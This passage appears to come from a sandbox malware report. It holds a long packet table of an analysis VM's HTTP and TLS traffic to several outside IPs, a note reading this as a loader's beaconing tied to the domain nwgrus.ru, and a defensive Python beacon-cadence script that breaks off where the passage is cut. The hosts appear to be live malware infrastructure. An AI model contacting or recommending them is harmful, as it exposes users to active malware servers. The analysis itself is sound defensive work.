                                        Oct 7, 2024 14:59:44.033884048 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.037662029 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.037738085 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.037916899 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.037940025 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.042890072 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.042901039 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.971501112 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.972651958 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.972760916 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.973345995 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.976273060 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.978383064 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.981369972 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.981478930 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.981661081 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.981683016 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.986996889 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.989341974 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.906971931 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.907615900 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.907705069 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:45.915400982 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:45.920272112 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.995304108 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.000938892 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:46.001060009 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.020895004 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.021135092 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.025818110 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:46.025979996 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047126055 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047144890 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047276020 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:47.049721956 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:47.053872108 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.053911924 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.053973913 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.054445982 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.054455042 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.054640055 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.709902048 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.710026026 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.714416981 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.714441061 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.714812040 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.725377083 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.767416954 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933795929 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933828115 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933975935 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.934005976 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.986707926 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.018661976 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018672943 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018739939 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.018790007 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018798113 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018841028 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.019932032 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.019941092 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.020003080 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.021042109 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.021126986 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.102281094 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.102339983 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.102360010 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.102380037 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.102422953 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.102441072 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.103187084 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.103254080 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.104007006 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.104078054 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.104857922 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.104913950 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.105701923 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.105767965 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.106625080 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.106692076 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.172045946 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.172247887 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 15:01:33.046710014 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.047821045 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.047875881 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.047879934 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325364113 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325716019 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325716972 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325875998 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325911045 CEST44350018188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:33.325939894 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:33.325965881 CEST50018443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:44.403997898 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.408998013 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:44.409090996 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.417134047 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.417171001 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:44.421916962 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:44.422120094 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179423094 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179444075 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179544926 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.179680109 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.179713964 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.179781914 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.180727959 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.180798054 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.181176901 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:46.181220055 CEST5001980192.168.2.5105.197.97.247
                                        Oct 7, 2024 15:01:46.188357115 CEST8050019105.197.97.247192.168.2.5
                                        Oct 7, 2024 15:01:54.292563915 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.292601109 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.292701006 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.293205023 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.293215036 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.994376898 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.994525909 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.996342897 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.996362925 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.996635914 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:54.998280048 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.998280048 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:54.998356104 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268094063 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268189907 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.268484116 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.282983065 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283027887 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.283128023 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283466101 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.283478022 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.758223057 CEST50020443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:55.758233070 CEST44350020188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.922323942 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:55.922533989 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.204224110 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.204247952 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.204587936 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.212061882 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.212061882 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.212075949 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460171938 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460396051 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.460542917 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460553885 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:01:56.460602999 CEST44350021188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:01:56.460648060 CEST50021443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:06.903160095 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908070087 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:06.908157110 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908350945 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.908404112 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:06.914069891 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:06.914134979 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.858335972 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.859997988 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:07.860198021 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:07.860198021 CEST5002280192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:07.865235090 CEST8050022189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:16.093089104 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093158007 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.093223095 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093559027 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.093584061 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.717792988 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.717869997 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.719166994 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.719197989 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.719466925 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:16.720180988 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.720215082 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:16.720228910 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024153948 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024265051 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024349928 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024466991 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024492025 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.024516106 CEST50023443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.024523973 CEST44350023188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.061141968 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061194897 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.061279058 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061609030 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.061621904 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.690265894 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.690362930 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.692949057 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.692964077 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.693279982 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:17.696377039 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.696403027 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:17.696471930 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001768112 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001867056 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.001970053 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002043962 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002060890 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:18.002074003 CEST50024443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:18.002079010 CEST44350024188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:28.921040058 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.925982952 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:28.926074982 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.926256895 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.926287889 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:28.931164980 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:28.931340933 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863377094 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863687992 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:29.863734007 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:29.864065886 CEST5002580192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:29.868839025 CEST8050025189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:38.573918104 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.573961973 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:38.574057102 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.574450016 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:38.574469090 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.762859106 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.762986898 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.764388084 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.764408112 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.764704943 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:39.765578985 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.765629053 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:39.765636921 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.046683073 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.046945095 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.046992064 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.047135115 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.047185898 CEST44350026188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.047199965 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.047245026 CEST50026443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.132939100 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133037090 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.133132935 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133444071 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.133475065 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.757666111 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.757751942 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.759046078 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.759076118 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.759371996 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:40.760067940 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.760117054 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:40.760126114 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069097996 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069179058 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069281101 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069408894 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069457054 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:41.069489002 CEST50027443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:02:41.069505930 CEST44350027188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:02:49.995513916 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000469923 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.000559092 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000724077 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.000741959 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.005556107 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.005572081 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926397085 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926558971 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:02:50.926728964 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.929590940 CEST5002880192.168.2.5189.195.132.134
                                        Oct 7, 2024 15:02:50.934519053 CEST8050028189.195.132.134192.168.2.5
                                        Oct 7, 2024 15:03:01.935972929 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936017990 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:01.936088085 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936686039 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:01.936702013 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.553555965 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.553684950 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.554976940 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.554987907 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.555284023 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.556086063 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.556116104 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.556121111 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864384890 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864458084 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864510059 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864561081 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864576101 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.864590883 CEST50029443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.864597082 CEST44350029188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.905472040 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905515909 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:02.905594110 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905965090 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:02.905980110 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.519984007 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.520106077 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.521672964 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.521682978 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.521944046 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.522764921 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.522803068 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.522806883 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824243069 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824323893 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824378967 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824424982 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824445963 CEST44350030188.40.141.211192.168.2.5
                                        Oct 7, 2024 15:03:03.824461937 CEST50030443192.168.2.5188.40.141.211
                                        Oct 7, 2024 15:03:03.824471951 CEST44350030188.40.141.211192.168.2.5
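The packet list above shows the pattern an analyst looks for in a loader's traffic: a short HTTP exchange on port 80 roughly every 21 seconds (to 105.197.97.247, then to 189.195.132.134 after the second nwgrus.ru lookup at 15:02:06), and a pair of TLS sessions to 188.40.141.211 about one second apart, repeating roughly every 22 seconds. The script below is an added example, not part of the Joe Sandbox report, that turns such a list into a beacon-cadence profile: it keeps the first packet of every connection the analysis VM opened, collapses connections opened within a chosen window (2 s, a parameter not taken from the report) into one check-in event, and reports the gaps between events per destination. The sample rows are transcribed from the table above in a whitespace-separated layout assumed by the parser.

```python
"""Beacon-cadence check over a sandbox packet list (added example, not report code)."""
from collections import defaultdict
from datetime import datetime
from statistics import median

CLIENT = "192.168.2.5"  # the analysis VM in this report

# Constructed sample: first packet of each outbound connection, transcribed from
# the TCP table of this report (plus one server reply to show it is ignored).
# Layout assumed here: "timestamp  src_port  dst_port  src_ip  dst_ip".
PACKETS = """\
Oct 7, 2024 15:01:26.161711931 CEST  50016  80   192.168.2.5  105.197.97.247
Oct 7, 2024 15:01:26.166595936 CEST  80  50016   105.197.97.247  192.168.2.5
Oct 7, 2024 15:01:31.340430021 CEST  50017  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:01:32.339948893 CEST  50018  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:01:44.403997898 CEST  50019  80   192.168.2.5  105.197.97.247
Oct 7, 2024 15:01:54.292563915 CEST  50020  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:01:55.282983065 CEST  50021  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:02:06.903160095 CEST  50022  80   192.168.2.5  189.195.132.134
Oct 7, 2024 15:02:16.093089104 CEST  50023  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:02:17.061141968 CEST  50024  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:02:28.921040058 CEST  50025  80   192.168.2.5  189.195.132.134
Oct 7, 2024 15:02:38.573918104 CEST  50026  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:02:40.132939100 CEST  50027  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:02:49.995513916 CEST  50028  80   192.168.2.5  189.195.132.134
Oct 7, 2024 15:03:01.935972929 CEST  50029  443  192.168.2.5  188.40.141.211
Oct 7, 2024 15:03:02.905472040 CEST  50030  443  192.168.2.5  188.40.141.211
"""


def parse_packet(line):
    """Return (timestamp, src_port, dst_port, src_ip, dst_ip) for one row."""
    fields = line.split()
    src_port, dst_port, src_ip, dst_ip = fields[-4:]
    stamp = " ".join(fields[:-5])            # timestamp has spaces; drop the TZ token
    base, frac = stamp.rsplit(".", 1)
    ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")  # ns -> us
    return ts, int(src_port), int(dst_port), src_ip, dst_ip


def connection_starts(lines, client=CLIENT):
    """One (timestamp, dst_ip, dst_port) per connection the client opened.
    A new client source port is a new connection; replies are skipped."""
    seen, starts = set(), []
    for line in filter(str.strip, lines):
        ts, sp, dp, sip, dip = parse_packet(line)
        if sip == client and (sip, sp) not in seen:
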